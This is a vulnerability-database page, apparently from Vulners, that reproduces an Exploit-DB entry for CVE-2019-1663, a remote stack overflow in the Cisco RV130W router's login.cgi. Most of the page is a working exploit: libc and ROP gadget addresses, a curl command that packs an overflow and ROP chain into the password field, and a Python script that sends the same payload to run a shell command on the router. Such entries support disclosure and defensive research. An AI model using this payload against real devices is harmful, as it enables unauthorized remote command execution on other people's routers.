Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco RV130W 1.0.3.44 - Remote Stack Overflow

🗓️ 04 Jun 2019 00:00:00Reported by @0x00stringType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 179 Views

Cisco RV130W 1.0.3.44 is vulnerable to a remote stack overflow exploit as of February 2019.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Cisco RV130W Routers Management Interface Remote Command Execution Exploit
15 Apr 201900:00
zdt
0day.today		Cisco RV130W 1.0.3.44 - Remote Stack Overflow Exploit
4 Jun 201900:00
zdt
0day.today		Cisco RV110W / RV130(W) / RV215W Remote Command Execution Exploit
2 Sep 201900:00
zdt
GithubExploit		Exploit for CVE-2014-8361
31 Mar 202611:18
githubexploit
GithubExploit		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Cisco Rv110W_Firmware
29 Nov 202517:54
githubexploit
GithubExploit		Exploit for Out-of-bounds Write in Cisco Rv110W_Firmware
2 Sep 202519:23
githubexploit
Circl		CVE-2019-1663
28 Feb 201915:31
circl
Cisco		Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability
27 Feb 201916:00
cisco
Tenable Nessus		Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability (cisco-sa-20190227-rmi-cmd-ex)
27 Feb 201900:00
nessus
CNVD		Cisco RV110W, RV130W, and RV215W Remote Command Execution Vulnerabilities
28 Feb 201900:00
cnvd
Rows per page
#!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
# 
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; 
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
# 
#   gadget 1    system()   junk   gadget 2   junk  junk  junk  junk  junk   gadget 3    text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'

#!/usr/bin/python
import requests

def banner():
    print '''
              @0x00string
             0000000000000
          0000000000000000000   00
       00000000000000000000000000000
      0000000000000000000000000000000
    000000000             0000000000
   00000000               0000000000
  0000000                000000000000
 0000000               000000000000000
 000000              000000000  000000
0000000            000000000     000000
000000            000000000      000000
000000          000000000        000000
000000         00000000          000000
000000       000000000           000000
0000000    000000000            0000000
 000000   000000000             000000
 0000000000000000              0000000
  0000000000000               0000000
   00000000000              00000000
   00000000000            000000000
  0000000000000000000000000000000
   00000000000000000000000000000
     000  0000000000000000000
             0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
'''

def main():
    banner()
    command = "ping 192.168.1.100\x00"
    print ("Sending exploit to execute [" + command + "]\n")
    rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
    payload = ("Z" * 446) + rop + command
    url = "https://192.168.1.100:443/login.cgi"
    data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
    r = requests.post(url, payload=data)

if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Jun 2019 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 3.19.8
CVSS 210
CVSS 39.8
EPSS0.87247
SSVC
cisco rv130w exploitremote stack overflowfebruary 2019cve-2019-1663vulnerable version.
179